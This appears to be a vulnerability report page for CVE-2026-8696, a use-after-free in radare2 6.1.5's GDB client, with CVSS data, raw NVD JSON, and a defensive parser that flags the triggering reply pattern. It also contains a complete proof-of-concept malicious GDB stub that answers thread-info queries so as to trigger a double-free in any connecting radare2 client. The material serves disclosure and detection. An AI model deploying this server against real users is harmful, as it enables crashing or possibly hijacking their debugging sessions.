Security Vulnerability Report
CVE-2026-8696 CVSS 7.5 HIGH

CVE-2026-8696

Published: 2026-05-15 21:16:39
Last Modified: 2026-05-15 21:16:39

Description

radare2 6.1.5 contains a use-after-free vulnerability in the gdbr_pids_list() function within the GDB client core that allows remote attackers to cause a denial of service or potentially execute arbitrary code by sending malformed thread information responses. Attackers can trigger the vulnerability by causing qsThreadInfo to fail after qfThreadInfo successfully allocates RDebugPid structures, resulting in double-free memory corruption when the error path attempts to clean up the list.

Note that the vulnerable code is the GDB client side of radare2: the attacker controls (or has compromised) the GDB stub, and the bug fires when a radare2 user connects to that stub (for example with r2 -d gdb://host:port) and the stub answers qfThreadInfo with a thread list and then answers qsThreadInfo with an error instead of the usual end-of-list reply.
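The reply pattern described above, as an added example that is not part of the original advisory and not radare2's own code: a small GDB Remote Serial Protocol parser that verifies packet framing and checksums and flags a stub that answers qfThreadInfo with a thread list ("m...") and then answers qsThreadInfo with an error ("E.."). The exchange data is constructed here to mirror the PoC's replies, and the function names are assumptions for illustration.

```python
#!/usr/bin/env python3
"""
Added example (not radare2 code and not the page's PoC): parse a GDB RSP
byte stream and flag the qfThreadInfo/qsThreadInfo reply sequence that the
CVE description says drives radare2 into the faulty cleanup path.
"""
import re

# One RSP frame: '$' payload '#' two-hex-digit checksum
PACKET_RE = re.compile(rb"\$([^#]*)#([0-9a-fA-F]{2})")


def rsp_checksum(payload: bytes) -> int:
    """RSP checksum: modulo-256 sum of the payload bytes."""
    return sum(payload) & 0xFF


def rsp_frame(payload: bytes) -> bytes:
    """Wrap a payload as $payload#xx (escape/run-length encoding not handled)."""
    return b"$" + payload + b"#" + b"%02x" % rsp_checksum(payload)


def rsp_packets(stream: bytes):
    """Return (payload, checksum_ok) for every framed packet in a byte stream.

    Bare '+' / '-' acknowledgements are not packets and are skipped.
    """
    return [(m.group(1), rsp_checksum(m.group(1)) == int(m.group(2), 16))
            for m in PACKET_RE.finditer(stream)]


def find_thread_info_anomaly(exchange):
    """Scan an ordered list of (direction, bytes), direction 'client' or 'stub'.

    Returns findings as (kind, payload) tuples. The kind
    'qsThreadInfo-error-after-qfThreadInfo' means the stub first announced
    threads ('m...') for qfThreadInfo and then answered qsThreadInfo with an
    error ('E..') instead of the end-of-list reply 'l'.
    """
    findings = []
    pending = None            # last client query still awaiting a reply
    threads_announced = False  # stub has sent an 'm...' list for qfThreadInfo
    for direction, data in exchange:
        for payload, ok in rsp_packets(data):
            if not ok:
                findings.append(("bad-checksum", payload))
                continue
            if direction == "client":
                pending = payload
                continue
            # Stub reply: correlate it with the outstanding client query.
            if pending == b"qfThreadInfo" and payload.startswith(b"m"):
                threads_announced = True
            elif pending == b"qsThreadInfo":
                if payload.startswith(b"E") and threads_announced:
                    findings.append(("qsThreadInfo-error-after-qfThreadInfo", payload))
                threads_announced = False
            pending = None
    return findings


# Constructed sample exchanges (not real captures). The first mirrors the
# malicious stub in the PoC; the second is a well-behaved stub.
MALICIOUS_EXCHANGE = [
    ("client", rsp_frame(b"qfThreadInfo")),
    ("stub", b"+" + rsp_frame(b"m1")),
    ("client", b"+" + rsp_frame(b"qsThreadInfo")),
    ("stub", b"+" + rsp_frame(b"E01")),
]
BENIGN_EXCHANGE = [
    ("client", rsp_frame(b"qfThreadInfo")),
    ("stub", b"+" + rsp_frame(b"m1,2")),
    ("client", b"+" + rsp_frame(b"qsThreadInfo")),
    ("stub", b"+" + rsp_frame(b"l")),  # 'l' = end of thread list
]

if __name__ == "__main__":
    print("malicious:", find_thread_info_anomaly(MALICIOUS_EXCHANGE))
    print("benign:   ", find_thread_info_anomaly(BENIGN_EXCHANGE))
```

The same correlation can be run over a captured TCP stream (for example one reassembled from a pcap) by splitting it into per-direction chunks in arrival order; packets with bad checksums are reported separately because a real client would reject them with '-' rather than act on them.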

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS 4.0 (secondary metric, from the raw data below)
8.7 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-416 (Use After Free)

Both vectors score availability impact only (C:N/I:N/A:H); the "potentially execute arbitrary code" wording in the description is not reflected in the scores. AV:N means the malicious stub is reached over the network, not that radare2 exposes a listening service.

Configurations (Affected Products)

No CPE configuration data is available for this entry.

Affected per the description: radare2 6.1.5.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-8696: Malformed GDB Server

This script simulates a malicious GDB server that triggers the UAF in radare2.
It sends a valid response to qfThreadInfo (allocating memory) and then an
error response to qsThreadInfo (triggering the double-free).

Run it, then point radare2 at it, e.g.  r2 -d gdb://127.0.0.1:9999

Changes from the one-line original: replies are now wrapped in RSP framing
($payload#xx) instead of being sent raw, and the handler no longer swallows
the client's first packet in a blind handshake recv(); a GDB client ignores
unframed replies, so the original would never reach the vulnerable path.
"""
import re
import socket
import threading

# One client packet: '$' payload '#' two-hex-digit checksum (checksum not verified here)
PACKET_RE = re.compile(rb"\$([^#]*)#[0-9a-fA-F]{2}")


def rsp_frame(payload: bytes) -> bytes:
    """Wrap a reply as $payload#xx, xx = modulo-256 sum of the payload bytes."""
    return b"$" + payload + b"#" + b"%02x" % (sum(payload) & 0xFF)


def reply(sock, payload: bytes):
    """Acknowledge the client's packet, then send the framed reply."""
    sock.send(b"+")
    sock.send(rsp_frame(payload))


def handle_client(client_socket):
    buf = b""
    try:
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            buf += data
            # Handle every complete packet in the buffer; bare '+'/'-' acks
            # from the client carry no command and are dropped with the prefix.
            while True:
                m = PACKET_RE.search(buf)
                if not m:
                    break
                cmd = m.group(1)
                buf = buf[m.end():]
                if cmd.startswith(b"qSupported"):
                    reply(client_socket, b"PacketSize=1024;qXfer:features:read+;multiprocess+")
                elif cmd.startswith(b"qfThreadInfo"):
                    # Send a valid thread ID to trigger RDebugPid allocation
                    reply(client_socket, b"m1;")  # Process ID 1
                elif cmd.startswith(b"qsThreadInfo"):
                    # Send error to trigger cleanup and double-free
                    reply(client_socket, b"E01")  # Error code
                elif cmd.startswith(b"Hg") or cmd.startswith(b"qC"):
                    reply(client_socket, b"OK")
                else:
                    # Empty reply = "unsupported packet" in RSP ($#00 on the wire)
                    reply(client_socket, b"")
    except Exception as e:
        print(f"Connection closed: {e}")
    finally:
        client_socket.close()


def start_server(port=9999):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(("0.0.0.0", port))
    server.listen(5)
    print(f"[*] Malicious GDB server listening on port {port}")
    while True:
        client, addr = server.accept()
        print(f"[*] Accepted connection from {addr[0]}:{addr[1]}")
        threading.Thread(target=handle_client, args=(client,), daemon=True).start()


if __name__ == "__main__":
    start_server()

References

https://github.com/radareorg/radare2/commit/c213ad6894a1eb9086ac8bf5fae35757e9e1683c (radare2 commit referenced by the advisory)
https://github.com/radareorg/radare2/issues/25836 (upstream issue)
https://www.vulncheck.com/advisories/radare2-use-after-free-via-gdbr-pids-list (VulnCheck advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8696", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:39.360", "lastModified": "2026-05-15T21:16:39.360", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 6.1.5 contains a use-after-free vulnerability in the gdbr_pids_list() function within the GDB client core that allows remote attackers to cause a denial of service or potentially execute arbitrary code by sending malformed thread information responses. Attackers can trigger the vulnerability by causing qsThreadInfo to fail after qfThreadInfo successfully allocates RDebugPid structures, resulting in double-free memory corruption when the error path attempts to clean up the list."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://github.com/radareorg/radare2/commit/c213ad6894a1eb9086ac8bf5fae35757e9e1683c", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/issues/25836", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/radare2-use-after-free-via-gdbr-pids-list", "source": "[email protected]"}]}}